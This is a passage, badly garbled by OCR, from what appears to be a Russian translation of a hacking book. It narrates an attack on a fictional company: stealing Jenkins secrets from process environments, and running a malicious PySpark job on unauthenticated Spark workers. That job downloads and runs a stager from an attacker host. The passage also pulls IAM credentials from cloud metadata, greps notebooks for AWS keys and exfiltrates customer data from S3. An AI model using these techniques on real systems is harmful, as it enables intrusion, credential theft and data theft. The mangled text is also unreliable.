-9 886477354405.йКг.есг.еи-неѕЁ-1. апагопамѕ. сот/амѕ -с1і 


Наша новая обратная оболочка работает в привилегированном 
контейнере, который монтирует сокет РосКег вместе со всей файло- 
вой системой хоста в каталоге /ћоѕ05 Ө: 


пеЁегргеёег > 15 /һоѕЕ05 
Біп БооЁ еу ес һоме іпііга. ітд 116 11664 1оѕё+Ғоџпа медіа тпё 
орЕ ргос гоо гип... 


Пора начинать вечеринку! 

Как мы видели в главе 10, Јепкіпѕ может быстро агрегировать зна- 
чительное количество привилегий благодаря своим возможностям 
планирования. Это «Леман Бразерс» технологического мира – жадная 
организация в неуправляемом царстве, поощряемая безрассудными 
политиками, и одна сделка отделяет ее от краха всей экономики. 

В нашем конкретном случае эта метафора относится к тому, как 
Јепкіпѕ обрабатывает переменные среды. Когда задание запланиро- 
вано к выполнению, его можно настроить либо на извлечение двух 
или трех секретов, необходимых для правильной работы, либо на 
загрузку всех возможных секретов в качестве переменных среды. 
Давайте узнаем, насколько на самом деле ленивы администраторы 
Сгеіѕсһ Росо. 

Выделим каждый процесс, запущенный заданиями Јепкіпѕ на этой 
машине: 


ѕһе11> рѕ -ед -о иѕег,рій, ста | дгер “јепкіпѕ” 

јепкіпѕ 1012 /1АЫ/ѕуѕеті/ѕуѕёета -изег 

јепкіпѕ 1013 55һа: јепкіпѕ@поЁёу 

Јепкіпѕ 1276 јама -ХХ:МахРегтЅіғе=256т -јаг гето&іпд.јаг... 
јепкіпѕ 30737 ОосКег гип --гт -1 -р 9876:9876 -\ /маг/11/... 
- - Сокращено- - 


Мы копируем РТО этих процессов в файл и перебираем каждую 
строку, чтобы получить их переменные среды, которые так удобно 
хранятся по пути /ргой/5РІр/епуігоп: 
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ѕһе11> рѕ -ей -о иѕег,рій, сті \ 

| гер “јепкіпѕ” \ 

| амк “{ргіпЕ $2}° \ 

> 1151ріайѕ.1хЇ 

ѕһе11> мһіЛе геад р; до \ 

саЕ /ћһоѕ&05 /ргос/$р/епуігоп >> геѕи15.хіё; \ 
Чопе <115$р\9$. хе 


Мы загружаем наш урожай на наш удаленный сервер и применя- 
ем небольшое форматирование, а затем наслаждаемся результатами 
в виде простого текста (листинг 12.3). 


Листинг 12.3. Результаты сбора переменных среды заданий, запущенных 
на машине Јепкіпѕ 


гооє@Роіпї1:~/# са геѕи1+5.ЁхЁ 

дһргБРи111а = 1068 

ЅАМОВОХ_РАТҮАТЕ_КЕҮ РАТН = /маг/116/јепкіпѕ /ѕапбох 
РВЕХР_РАКОЮ_ОЅЕВ = р9$9\_ехр 

рВЕХР _РАОр РАЅ = уроМие8%12№97 

МЕТАМАВКЕТ_ТОКЕМ№ = 154Х93_ гип149ЈКткупОНћо8рбре5720С1%5... 
ВАЗНВОАВО_РВОБ_РАЗЗИОВО = 4һХи1СаһргЬІ024745 
ЅРААК_МАЅТЕВ = 10.50.12.67 

Асёџа1СоттіАџёћогЕтаі1 = Е1аіп.оһабег@дгеєѕсһро1і+ісо. сом 
ВТМТВАУ АРТ_КЕУ = 5570459а1е9ас79а1йа575#Бее88асіеасѕд75 
СТТНУВ_АРТ = 8е24#Ғссдееййееб7зҒҒадсе5433#Ғсее7асе561 


ЕСК_АМ$_ТО = АКІА767АКТХ105874Н2Р 
ЕСК_АМЗ_ТО = 205с0700/52№ЕККЕ99ра\пҮбапһд2253007+29Ь 
- -Сокращено- - 


Чудесно. Мы получили токен АРІ СИНиь для изучения всей кодовой 
базы СР, пару паролей к БД для сбора каких-то данных и, очевидно, клю- 
чи доступа АМ/$, которые должны иметь как минимум доступ к ЕСК (ре- 
естру контейнеров АҮ) или, возможно, даже к ЕС2, если нам повезло. 

Загружаем их на свой сервер и вслепую начинаем исследовать сер- 
висы А\М\/5: 


гооЁ@Роіпї1:~/# амз есг йеѕсгіђе-героѕіёогіеѕ \ 
- -гед\оп=ец-иез*-1 \ 

--ргоДе дгеЁѕсһ1 

"героѕіёогуМате": "116-ргедісЁ\іоп", 
"героѕіогућаме": "ѕегуісе-део1ос", 
"героѕіогуМаме": "сооКіе-таёсһіпд", 

- -Сокращено- - 


гооє@РоіпЁ1:~/# амѕ ес2 йеѕсгібе-іпѕёапсеѕ --рго Де дгеЁѕсһ1 
Ап еггог оссиггед (Опаџёћогіғей0регаїіоп)... 


гооЁ@Роіпї1:~/# амѕ 53арі 115&-Бискеїѕ --рго Де дгеіѕсһ1 
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Ап еггог оссиггед (Опаџћогіғей0регаїіоп)... 


гоої@Роіпї1:~/# амѕ Там де{-изег --рго Ще дгеёѕсһ1 
Ап еггог оссиггед (Ассеѕѕрепіеа)... 


Мы сталкиваемся с несколькими ошибками, как только выходим 
за пределы ЕСК. В другое время и в другом контексте мы бы возились 
с образами контейнеров, искали жестко запрограммированные учет- 
ные данные или вмешивались в теги, чтобы добиться выполнения 
кода на машине, но есть иной путь, который кажется более многообе- 
щающим. Он был спрятан внутри данных среды, которые мы выгру- 
зили в листинге 12.5, поэтому я просто укажу на него пальцем: 


ЗРАВК_МАЗТЕК = 10.50.12.67 


Слово ЅРААК здесь указывает на АрасВе Ѕрагк, механизм аналити- 
ки с открытым исходным кодом. Может показаться странным, что 
мы отложили в сторону ключи доступа ЕСВ и учетные данные базы 
данных только для того, чтобы сосредоточиться на этом одиноком ІР- 
адресе, но вспомните одну из наших первоначальных целей: получе- 
ние профилей пользователей и сегментов данных. Этот тип данных 
не будет храниться в базе данных размером около 100 ГБ. При запол- 
нении всей доступной информацией о каждом человеке и с учетом 
охвата платформы МХЕ А4$ эти профили данных могут легко дости- 
гать сотен, если не тысяч терабайт. 

Когда компании имеют дело стакими безумными объемами, обыч- 
но возникают две проблемы. Где хранить необработанные данные? 
И как их эффективно обрабатывать? 

Хранить необработанные данные легко. 53 дешев и надежен, так 
что это не проблема. Однако обработка гигантских объемов данных 
является реальной проблемой. Специалистам по данным, стремя- 
щимся моделировать и прогнозировать поведение по разумной цене, 
нужна распределенная система для выполнения вычислительной за- 
дачи – скажем, 500 машин, работающих параллельно, каждая из ко- 
торых обучает несколько моделей со случайными гиперпараметрами, 
пока они не найдут модель с наименьшим коэффициентом ошибок. 

Но это порождает дополнительные проблемы. Как эффективно 
распределять данные между узлами? Что, если всем машинам нуж- 
ны одни и те же данные? Как объединять результаты? И самое глав- 
ное: как справиться с внезапными поломками? Поломки обязательно 
будут. На каждую тысячу машин в среднем 5, если не больше, в обо- 
зримой перспективе выйдут из строя по разным причинам, включая 
проблемы с дисками, перегрев, отключение электроэнергии и другие 
опасные события, даже в центре обработки данных высшего уровня. 
Как перераспределить аварийную нагрузку на более работоспособ- 
ные узлы? 

Именно эти вопросы и призван решить Арасћһе 5рагК с помощью 
своей распределенной вычислительной среды. Если ЗрагК задейство- 
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ван в Стезсв РоНЯсо, то наверняка он используется для обработки 
огромных объемов данных, которые, скорее всего, являются профи- 
лями пользователей - отсюда наш интерес к ІР-адресу, который мы 
получили на машине ЈепКіпѕ. 

Взлом кластера 5рагК автоматически позволит нам получить доступ 
к необработанным данным профилей, узнать, через какую обработку 
они проходят, и понять, как Стеїѕсһ РоНсо использует свои данные. 

На данный момент, однако, мне не попадалось на глаза ни одного 
поста, который помог бы нам растрясти кластер ЅрагК (то же самое 
наблюдение можно сделать почти о каждом инструменте, связанном 
с большими данными: Үагп, Е1іпК, Надоор, Ніхе и так далее). Нет даже 
скрипта №тар для снятия цифровых отпечатков этой чертовой шту- 
ки. Мы плывем по неизведанным водам, поэтому самый естествен- 
ный шаг - сначала понять, как взаимодействовать с кластером ЗрагК. 


Как устроен Ѕрагк 


Кластер ЅрагКк по существу состоит из трех основных компонентов: 
мастер-сервера, рабочих машин и драйвера. Драйвер - это клиент, 
который хочет выполнить расчет; например, это может быть ноут- 
бук аналитика. Единственная работа мастер-сервера (диспетчера) – 
управлять процессами на рабочих машинах (воркерах) и назначать 
им задания в зависимости от требований к вычислительным ресур- 
сам. Воркеры выполняют любые задания, которые им назначил дис- 
петчер. Они общаются как с диспетчером, так и с драйвером. 

Каждый из этих трех компонентов запускает процесс 5рагК внутри 
виртуальной машины ]ауа (УМ), даже ноутбук аналитика (драйвер). 
Однако вот в чем проблема: безопасность в ЗрагК по умолчанию от- 
ключена. 

Мы говорим не только об отсутствии аутентификации, хотя даже 
это было бы очень плохо. Нет, безопасность совсем отключена, вклю- 
чая шифрование, контроль доступа и, конечно же, аутентификацию. 
Ребята, очнитесь, за окном 2022 год! 

Согласно официальной документации, для связи с кластером Ѕрагк 
необходимо соблюсти несколько требований. Сначала нам нужно 
иметь возможность связаться с диспетчером через порт 7077, чтобы 
запланировать задания. Воркеры также должны иметь возможность 
инициировать соединения с драйвером (нашим узлом ЈепКіпѕ), чтобы 
запросить выполнение ЈАК-файла, сообщить о результатах и обрабо- 
тать другие этапы планирования. 

Учитывая наличие переменной среды 5РАВК_МАЗТЕК в листинге 12.3, 
мы почти уверены, что Јепкіпѕ запускает какие-то задания Ѕрагк, по- 
этому мы можем рассчитывать, что все эти сетевые требования со- 
блюдаются. Но на всякий случай давайте сначала убедимся, что мы 
можем, по крайней мере, связаться с диспетчером Ѕрагк. Единствен- 
ный способ проверить второе требование (что воркеры могут под- 
ключаться к драйверу) - отправить задание или проверить группы 
безопасности. 
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Мы добавляем в Мегазр]ой маршрут к диапазону 10.0.0.0/8, чтобы 
достичь основного [Р-адреса ЅрагК (10.50.12.67) и направить его че- 
рез наш текущий сеанс теѓегргеѓег: 


пеќегргеќег > Баскдгоипі 


5+ ехр1оі&(ти1+1 /Вап ег) > гоџёе ада 10.0.0.0 255.0.0.0 12 
[*] Аоиёе адйеа 


Затем мы используем встроенный сканер Меѓаѕріоїї для проверки 
порта 7077: 


тѕҒ ехр1оі&(ти1+1 /Вап ег) > иѕе аџхіЛлагу/ѕсаппег/рогёѕсап/&ср 
тѕҒ ехр10оі(ѕсаппег/рогёѕсап/ёср) > ѕеё ВНО$Т$ 10.50.12.67 

тѕҒ ехр10і&(ѕсаппег/рогЁѕсап/&ср) > ѕеё РОВТ$ 7077 

5+ ехр10і&(ѕсаппег/рогёѕсап/ёср) > гип 


[+] 192.168.1.24: - 192.168.1.24:7077 - ТСР ОРЕМ 
[*] Ѕсаппей 1 оф 1 һоѕ5 (100% сотр1еїе) 


Никаких неожиданностей. Мы можем общаться с диспетчером. Хо- 
рошо, давайте напишем наше первое вредоносное Ѕрагк-приложение! 


Вредоносный Ѕрагк 


Несмотря на то что ЗрагК написан на языке Зса[а, он очень хорошо 
поддерживает программы на Руоп. Преобразование объектов Ру- 
Топ в объекты ]ауа сопряжено с большими затратами на сериализа- 
цию, но нас это не волнует. Нам нужна оболочка только на одном из 
воркеров. 

У Ру!оп даже есть пакет рір, который загружает файлы ЈАК объ- 
емом 200 МБ для быстрой настройки рабочей среды ЗрагК: 


$ руєћоп -т рір іпѕ&а\1 руѕрагк 


Каждое приложение Ѕрагк начинается с одного и того же стандарт- 
ного кода, который определяет ЅрагКСопёехї – коннектор на стороне 
клиента, отвечающий за взаимодействие с кластером Ѕрагк. Мы за- 
пускаем наше приложение с этим кодом установки (листинг 12.4). 


Листинг 12.4. Код установки вредоносного приложения 5рагк 


Тгом рузрагК ітрогё ЅрагКСопёехё, ЅрагкСопЁ 


# Настройка конфигурации 
СопЁ = ЅрагкСоп#() 
СоПпЁ = сопЁ. ѕеЁАррћате( "Кога Соџпї") 


# Добавление ІР диспетчера Ѕрагк 


256 Глава 12 


сопР = сопЁ. ѕеЁМаѕёег("ѕрагк: //10.50.12.67:7077") 


# Добавление ІР нашего воркера Јепкіпѕ 
СопЁ = сопЁ.ѕеї("ѕрагк.ӣгімег.һоѕі", "10.33.57.66") 


# Инициализация контекста Ѕрагк информацией, нужной для подключения к диспетчеру 
5с = ЅрагКкСопёех(сопЁ = соп?) 


Этот контекст Ѕрагк Ө реализует методы, которые создают распре- 
деленные данные и управляют ими. Он позволяет нам преобразовать 
обычный список Руіћоп из монолитного объекта в набор блоков, ко- 
торые можно распределить по нескольким машинам. Эти блоки на- 
зываются разделами. Каждый раздел может содержать один, два или 
три элемента исходного списка - в зависимости от того, что ЅрагК со- 
чтет оптимальным. Определим такой набор разделов, состоящий из 
10 элементов: 


раг{11$Е = ѕс.рага11е1іғе(гапде(0@, 10)) 


На моем компьютере рагі 15. деМитРагіі1опѕ возвращает 2, что 
указывает на то, что он разделил исходный список на два раздела. 
Раздел 1, вероятно, содержит элементы 0, 1, 2, 3 и 4. Раздел 2, вероят- 
но, содержит элементы 5, 6, 7,8 и 9. 

РагЕ [15 теперь представляет собой набор разделов. Это устойчи- 
вый распределенный набор данных (гезШепе аіѕігібиїеа ааѓаѕеї, ВОО), 
который поддерживает множество итерационных методов, извест- 
ных как преобразования ЅрагК, таких как тар, Ғ1.а&Мар, гедисеВуКеу 
и другие, которые будут преобразовывать данные распределенным 
образом. Выполнение кода кажется слишком долгим обходным путем 
по сравнению с операциями МарКейиџсе, но потерпите немного: скоро 
сложится общая картина. 


мар – это метод, который по заданному списку (1, 2, 
5, 4,... п) иметоду Е возвращает новый список: (Е(1), Е(2), .... Е(п)). ЕТа*- 
Мар – это метод, который для каждого элемента может возвращать 
ноль, один или несколько объектов. Таким образом, для заданного списка 
(1, 2, 3... п) и метода Е #.а&Мар может возвращать только (Е(1)) или 
(Е(2), Е(3)). Е(2) может быть отдельным элементом или другим списком. 


Прежде чем продолжить работу с нашим приложением ЅрагкК, 
я приведу пример использования АР! мар для циклического перебора 
каждого элемента разделов, передачи их функции аййТеп и сохране- 
ния результата в новом КОР (листинг 12.5). 


Листинг 12.5. Использование АР! тар в 5рагк 


деҒ адатеп(х): 
гефигп х+10 
р1чѕТепі 151 = рагї1415&.тар(аййдопе) 
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Теперь р1иѕТепі1ѕЁ содержит (10, 11, ...). Чем это отличается от 
обычной встроенной функции тар в Ру оп или классического 
цикла? Скажем, например, у нас было два воркера и два раздела. 
Ѕрагк отправит элементы с 0 по 4 на машину № 1, а элементы с 5 
по 9 - на машину № 2. Каждая машина перебирает список, приме- 
няет функцию аййТеп и возвращает частичный результат драйверу 
(нашей машине Јепкіпѕ), который затем объединяет их в конечный 
результат. 

Если машина № 2 выйдет из строя во время расчета, Ѕрагк автома- 
тически перепланирует ту же рабочую нагрузку на машину № 1. 

В этот момент, я уверен, вы думаете: «Отлично. ЅрагК - это круто, но 
зачем нам длинная лекция про мари ВОО? Разве мы не можем просто 
отправить код Руіћоп как есть и выполнить код?» 

Хотел бы я, чтобы это было так просто. 

Видите ли, если мы просто добавим классический вызов $и6рго- 
сеѕѕ.Рореп и выполним скрипт, то... вы сами можете посмотреть, что 
будет, в листинге 12.6. 


Листинг 12.6. Код Рупоп выполняет команды локально, а не отправляет 
их в кластер 5рагк 


Тгом рузрагК ітрогё брагКСопфехе, ЅрагкСопЁ 
гот ѕирргосеѕѕ ітрогі Рореп 


сопР = ЅрагкСоп#() 
СоПЁ = сопЁ. ѕеЁМаѕёег("ѕрагк: //10.50.12.67:7077") 
СоПЁ = сопЁ. ѕеЁ("ѕрагк.йгімег.һоѕЁ", "10.33.57.66") 


5с = ЅрагкСопёех(сопЁ = соп) 
раг 15 = ѕс.рага1Ле1іғе(гапде(0, 10)) 
ргіпё(Рореп([ "ћоѕпаме"], ѕёйоџё=ѕирргосеѕѕ.РІРЕ). ѕйоџі.геай()) 


$ руєћоп Ёеѕі_арр.ру 
891451сЗбебЬ 


$ һоѕЕпате 
891451сЗбебЬ 


Когда мы запускаем наше тестовое приложение, нам возвращается 
идентификатор нашего собственного контейнера. Команда һоѕїіпате 
в коде Рућоп была выполнена в нашей системе. Она даже не дошла 
до диспетчера Ѕрагк. Что случилось? 

Драйвер ЅрагкК, т. е. процесс, который инициализируется РуЅрагк 
при выполнении кода, технически не отправляет код Руіћоп диспет- 
черу. Во-первых, драйвер строит направленный ациклический граф 
(Яігесїеа асусИс этарВ, РАС), который является своего рода сводкой 
всех операций, выполняемых с ВО, таких как загрузка, тар, Ғ1аЄМар, 
сохранение в виде файла ит. д. (рис. 12.1). 
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Распарал- 
леливание 


Рис. 12.1. Пример простого БАС, состоящего из двух шагов: 
распараллеливание и тар 


Затем драйвер регистрирует рабочую нагрузку на сервере-диспет- 
чере, отправляя несколько ключевых свойств: имя рабочей нагрузки, 
запрошенный объем памяти, количество начальных исполнителей 
и т. д. Диспетчер подтверждает регистрацию и назначает ворке- 
ры ЗрагК на входящее задание. Он передает свои данные (ІР-адрес 
и номер порта) драйверу, но никаких действий не следует. До этого 
момента никаких реальных вычислений не производится. Данные 
по-прежнему находятся на стороне драйвера. 

Драйвер продолжает синтаксический анализ сценария и при необ- 
ходимости добавляет шаги в РАС, пока не столкнется с тем, что он 
считает действием АРІ ЗрагК, вызывающим свертывание РАС. Этим 
действием может быть вызов для отображения вывода, сохранение 
файла, подсчет элементов и т. д. (вы можете найти список действий 
ЗрагК по адресу ИНру/Ьй.1у/ЗаИ/64ОР). Тогда и только тогда РАС будет 
отправлен воркерам $рагК. Эти воркеры действуют согласно схеме 
РАС для выполнения содержащихся в нем преобразований и дей- 
СТВИЙ. 

Что ж, понятно. Мы обновляем наш код, добавляя действие (в дан- 
ном случае метод со\1Песї), которое инициирует отправку приложе- 
ния на узел воркера (листинг 12.7). 


Листинг 12.7. Добавление действия к вредоносному приложению 5рагк 


Тгом рузрагК ітрогё ЅрагКСопёехё, брагКСопЕ 

- -Сокращено- - 

раг{11$Е = ѕс.рага11е1іғе(гапде(@, 10)) 
Рореп( [ "Һоѕёпате"], $&4ои%=зибргосе$$.РТРЕ).${Чои*.геа4() 


Ғог а іп ИАлпа 15+. соДесЕ(): 
ргіпё(а) 


Но нам все еще не хватает важной части. Воркеры выполняют схе- 
му РАС, а ВАС отвечает только за ресурсы ВОО. Нам нужно вызвать 
метод Рореп, чтобы выполнять команды на рабочих процессах, но 
Рореп не является ни преобразованием Ѕрагк, как тар, ни действием, 
таким как со Пес, поэтому он не попадет в РАС и будет проигнори- 
рован воркерами. Нам нужно схитрить и включить выполнение на- 
шей команды в преобразование Зра!К (например, мар), как показано 
в листинге 12.8. 
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Листинг 12.8. Каркас полного исполняемого кода приложения в кластере 
Ѕрагк 


Ғгот рузрагК ітрогё ЅрагКСопёехё, ЅрагкСопЁ 

Ғгот ѕирргосеѕѕ ітрогі Рореп 

Ароїћеоѕіѕ 209 

сопЁ = ЅрагКСопЁ() 

СопЁ = сопЁ. ѕеЁАррћате( "Кога Соџпё") 

сопЁ = сопЁ. ѕеЕМаѕ&ег("ѕрагк: //10.50.12.67:7077") 
соп = сопЁ. ѕе("ѕрагк.Ягімег.һоѕЁ", "10.33.57.66") 


5с = ЅрагкСопёех(сопЁ = соп) 
рагі151 = 5с. рага1Ле1іғе(гапде(0, 1)) 
Ғіпа45& = рагі15&.тар( 
ТатЬЧа х: Рореп([ "Һоѕёпате"], ѕдоџё=ѕирргосеѕѕ.РІРЕ). ѕ#йоџї.геаа() 
) 
Ғог а іп Ёіла1115#.со1Лесё(): 
ргіпі(а) 


Вместо того чтобы определять новую именованную функцию и вы- 
зывать ее итеративно через тар (как мы делали в листинге 12.5), мы 
создаем экземпляр анонимной функции с префиксом 1апЬа, которая 
принимает один входной параметр (каждый элемент повторяется) ®. 
Когда воркер прогоняет цикл через наш ВОО, чтобы применить пре- 
образование тар, он наталкивается на нашу функцию 1атБйа, которая 
дает указание выполнить команду һоѕіпапе. Давайте попробуем: 


$ руіһоп %е$*_арр.ру 
19/12/20 18:48:46 МАВМ Ма \уеСодегоа4ег: ЏпаБ1е фо ТоаЧ паііме-һайоор 14Ьгагу Ғог уоџшг 


р1аЁғогт. .. 


45119 БиіЛ1+іп- јама с1аѕѕеѕ мһеге арр1ісаБ1е 


Оѕіпд брагК'$ деҒаџ1& 1094] ргоҒі1е: огд/арасһе/ѕрагк/1094ј -еҒаџ165.ргорегёіеѕ 


Ѕеёёіпд деҒаџ1 109 1еме1 ёо "МАВМ". 
То айјиѕ 1оддіпд 1еме1 изе ѕс.ѕеЁгодіеуе1 (пемеуе1). Рог брагКВ, изе 
ѕеїіодіеме1 (пем еме1). 


1р-172-31-29-239 


Готово! Мы связались с диспетчером. Хорошее, чистое выполнение 
команды, и, как и было обещано, ЅрагК ни разу не потрудился запро- 
сить у нас учетные данные. 

Если мы перезапустим программу, наша задача может быть за- 
планирована для выполнения на другом рабочем узле. Это ожидае- 
мо и фактически лежит в основе распределенных вычислений. Все 
узлы идентичны и имеют одинаковую конфигурацию (роли ІАМ, се- 
тевые фильтры и т. д.), но они не обязательно будут вести одинако- 
вую жизнь. Один воркер может получить задание, которое сбрасывает 
учетные данные базы данных на диск, а другой будет обрабатывать 
сообщения об ошибках. 
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Мы можем заставить ЗрагК распределить нашу рабочую нагрузку на 
п машин, создав ВОО сп разделами: 


рагёі15+ = ѕс.рага11е1іғе(гапде(@, 10), 10) 


Однако мы не можем выбирать, какие из них получат полезную на- 
грузку. Пора настроить резидентную задачу на паре воркеров. 


Захват Ѕрагк 


Чтобы наше вредоносное приложение оставалось в игре, нам нуж- 
но, чтобы Шпих порождал его в своей собственной группе процессов, 
игнорируя сигналы прекращения от ЈУМ, когда задача выполнена. 
Нам также нужно, чтобы драйвер подождал несколько секунд, пока 
приложение не установит стабильное соединение с нашей атакую- 
щей инфраструктурой. Для этого добавим в приложение следующие 
строки: 


- -Сокращено- - 
Ипа 15 = раг 115$ .тар( 
ТатЬда х: зибргосез$ .Рореп( 
"идее һрѕ: / /дгеѕсһ-ѕрагк-еи.53.атагопамѕ.сот/ѕЁадег && сбтоЧ +х 
./зкадег && . /ѕадег &", 
ѕһе11=Тгие, 
ргеехес_Ёп=05.ѕеїрдгр, 
) 


) 
Ғіпа1ѕ .со1Лесі() 


іме. ѕ1еер(10) 


$ руєћһоп гемегѕе_арр.ру 
- -Сокращено- - 


В нашей атакующей инфраструктуре мы открываем Меазрой 
и ждем, пока приложение перезвонит домой: 


[*] ћрѕ://0.0.0.0:443 һапд\ііпд гедиеѕї Ғгот... 
[*] ћрѕ://0.0.0.0:443 һапд\ііпд гедиеѕї Ғгот... 
5+ ехр1оі&(ти1+1 /Һапд1ег) > ѕеѕѕіопѕ -1 7 

[*] Ѕёагёіпд іпёегасёіоп мА 7... 


мефегргефег > ехесифе -1 -Ғ ій 
Ргосеѕѕ 4638 сгеа*ед. 
Сһаппе1 1 сгеаїеа. 


010=1000(ѕрагк) 910=1000(5рагк) 
9гоирѕ=1000(ѕрагк) ,4(адт) ,24(сӣгот) ,27(50ийо),30(91р),46(р10ддеу), 
110(1ха), 115(1радтіп),116(ѕатБаѕһаге)... 
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Фантастика! Мы добрались до одного из воркеров. Мы работаем 
как обычный пользователь Ѕрагк Ө, которому достаточно доверяют, 
чтобы включить его в группу $490. С этой стороны экрана претензий 
нет. Давайте изучим это новое окружение, сохранив дамп перемен- 
ных среды, смонтированные папки, роли ІАМ или что-нибудь еще, 
что может быть полезно: 


мефегргефег > ехесифе -1 -Н -Р сиг\ -а \ 
һер: //169.254.169.254/1аеѕі/те+а-йаёа/іат/ѕесигіёу-сгейепёіа15 


ѕрагк-ѕЁапда1опе.ес2 


мефегргефег > ехесифе -1 -Н -Ё сиг\ -а \ 

Һер: //169.254.169.254/1а+еѕі/тефа-даёа/іат/ѕесигі+у-сгейепёіа15 /ѕрагк-\ 
$фапда\опе.ес2 

"АссеѕѕКеуІа" : "АЗТА447ВК6и$$6036\/45", 

"бесге{АссеззКеу" : "х2Х№т+роО1Е8Н/01сКаМрОсохЕГЕОТНҒ1М9КаЁх2" , 

"Токеп" : "100763Јр2210Х213Е71///////// /мЕасиу1.Ха1с30%М... 


Мы видим, что воркеры ЅрагК могут реализовать роль ѕрагк-ѕ#апа- 
а1опе.ес2. Как и в случае с большинством ролей ІАМ, трудно узнать 
все ее привилегии, но мы можем получить некоторые подсказки, ис- 
пользуя команду поџпЁ: 


мефегргефег > ехесифе -1 -Н -ЁҒ моипЕ 

--Ѕпір-- 

$35 оп /һоте/ѕрагк/поёеБоокѕ Ұуре Ёџѕе.53#5 (гм, поѕиій, подем...) 
Ғиѕесї оп /5у5/ #5 /Ёиѕе/соппесііопѕ уре Ёџѕесї1 (ги, ге1аіте) 

- -Сокращено- - 


Похоже, что СР использует $315 для локального монтирования кор- 
зины 55 в /һоме/ѕрагк/поёеБоокѕ. Извлекаем имя бакета из списка 
процессов (используя команду рѕ, дополненную аргументом -ейў): 


мефегрге{фег > ехесифе -1 -Н -Ё рѕ -а “-ейҒ” 

- -Сокращено- - 

Ѕрагк 14067 1 1 2018 00:51:15 53#5 дгеёѕсһ-поёеБоокѕ /Воте/зрагКк/пофеБооК$ -о іам го1е 
- -Сокращено- - 


Бинго! Бакет, сопоставленный с папкой пойероок$, называется дге*- 
ѕсһпоЁеБоокѕ. Давайте загрузим учетные данные роли и исследуем 
этот бакет: 


гоо@Ро1пЕ1:-/# амѕ $Зар\ 115&-оБјесЁѕ-у2 \ 
--Бискеё-пате дгеЁѕсһ-поёеБоокѕ \ 
--ргоҒіЛе ѕрагк 


"Кеу": "јеѕѕіе/Опёі еа. ірупЬ", 
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"Кеу": "Леѕ1ле/Сопуегѕіоп_Мойе1 /Лодіѕїіс гед роіпі.ірупЬ", 
"Кеу": "тагс/Ехрегітепё - Сбооа 1одіѕїісѕ 1055 сасһе.ірупЬ", 
--5пір- - 


И в самом деле интересно. Бакет содержит файлы с расширениями 
.АрупЬ, что является отличительной чертой блокнотов Руоп Јиру- 
сег. Блокнот Јируѓег похож на веб-интерфейс командной строки Ру- 
Поп (СЦ), разработанный для специалистов по данным, чтобы легко 
настраивать рабочую среду с возможностью построения графиков 
и обмена результатами работы. Эти блокноты также можно легко 
подключить к кластеру ЗрагК для выполнения рабочих нагрузок на 
нескольких компьютерах. 

Специалистам по данным нужны данные для выполнения расче- 
тов. Большинство скажет, что им нужны реальные производственные 
данные, чтобы делать точные прогнозы. Эти данные хранятся в таких 
местах, как базы данных и бакеты 53. Поэтому вполне естественно, 
что блокноты Јируѓег быстро превратились в теплый пруд, изобилую- 
щий жестко запрограммированными учетными данными, поскольку 
ученым требовалось все больше и больше наборов данных. 

Давайте синхронизируем весь бакет и начнем искать учетные 
данные АМЅ. Все идентификаторы ключей доступа АМ$ начинаются 
с волшебного слова АКТА, поэтому мы ищем эти символы при помощи 


9гер: 


гооЁ@Роіпї1:~/# амѕ 53 упс $3: / /дгеёѕсһ-поёеБоокѕ ./пофеБоок$ 


гоо@Роіп+1 : ~поёеБоокѕ /# дгер -В “АКТА” -4 * 
уока/Сопуегѕіоп_тойе1/... амѕКеу0рї = 

Ѕоте(\ "АКІААЅЈАСЕ”РҮА7ҮН27М605\") ,\п", 
уџка/Сопуегѕіоп_тойе1/... амѕЅесгеїорї = 
Ѕоме(\"Зсед4356СптҮККі2КОгЕ7аг0гѕ55хіакут о1.14050\" )\п", 
- -Сокращено- - 


Вы только посмотрите на это! Мы собрали десятки личных учетных 
данных А\М\/5, вероятно, принадлежащих всему отделу данных Сгеїѕсһћ 
Ро со. 

Давайте также поищем вхождения распространенных драйверов 
55, используемых в ЗрагК (53а и $3п), и раскроем некоторые ценные 
бакеты $53, регулярно используемые для загрузки данных и проведе- 
ния экспериментов: 


гоо{@Ро\пЕ1 : ~поёеБоокѕ /# едгер -В “$3[а|п]://” * 

53а: / /агеѕсһ-Ғіпапсе/рогЕҒо1іо/ехрог5/2019/03/ герог1579446047119.сѕү 
53а: / /агеѕсһ-һайоор/епдіпе/аҒё-рег#/... 

53а: / /агеѕсһ-һайоор-иѕ1/пј /тебіа/еподіпе/с1іскЕһгоџдһ/... 

53а: / /агеѕсһ-һайоор-еџ1/ае/ѕосіа1 /ргоЁҒіЛеѕ/тарріпо/... 

- -Ѕпір- - 
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Взгляните на название этого первого бакета: дгеёѕсһ-Ғіпапсе Ө. 
Это должно быть весело. Мы будем использовать один из ключей АМ, 
которые мы получили из той же записной книжки, и выгрузим ключи 
в рогЕҒо1іо/ехрогіѕ/2020: 


гооЁ@Роіпї1:~/# амѕ $3 ѕупс \ 
53: / /агеёѕсһ-Ғіпапсе/рогЕҒо1іо/ехрог5/2020/ ./ехрогЕ$_20/ --ргоҒіЛе даёа1 


гооЁ@Роіпї1:~/# 15 ехрог$_20/ 
.191/герогі1548892800915.с5у 
.192 /герог+1551319200454.сѕу 

. [03 /герогё1551578400344.сѕу 
.194/герог+1553997600119.с5у 

- - Сокращено- - 


Давайте выберем случайный файл: 


гоо@Ро1п{1:-/# һеай . /03/герогЕ1551578400344. сѕу 

аппиа1 геуепие, 1аѕі сопфасе, іпії\іа1 сопёасі, соџпігу, ассоџпї, 
гір сойе, ѕегуісе ригсһаѕеа, ... 

0.15, 20191204, 20180801, ҒАМ па оп, ВВ, 13010, 5... 

.11, 20200103, 20170103, ВРИ, 05, 1101, 0... 


Это список клиентов, все в порядке! Мы получаем не только теку- 
щих клиентов, но и потенциальных. Подробная информация вклю- 
чает в себя, когда к ним в последний раз обращались, где, кем, какую 
последнюю услугу они приобрели и сколько они потратили на плат- 
форму. 


Алгоритмы машинного обучения плохо справляются 
с широкими диапазонами чисел. Поэтому общепринятой практикой 
является масштабирование всех чисел до одного и того же диапазона, 
например от 0 до 1. Если самый высокий годовой доход составляет 1 млн 
евро, то 0,15 в отчете эквивалентны 150 000 евро. 


Используя эти данные, СР может получить ценную информацию 
о покупательских привычках своих клиентов и, возможно, устано- 
вить скрытые взаимосвязи между различными свойствами, такими 
как место встречи и доход, – возможности безграничны. Если вы об- 
ращаетесь в компанию по добыче данных, вы сами становитесь ча- 
стью эксперимента. Это справедливо. 

Это одна цель, которая почти достигнута. Возможно, нам удастся 
найти более подробную информацию, но пока у нас есть солидный 
список потенциальных и проверенных клиентов. Мы можем гуглить 
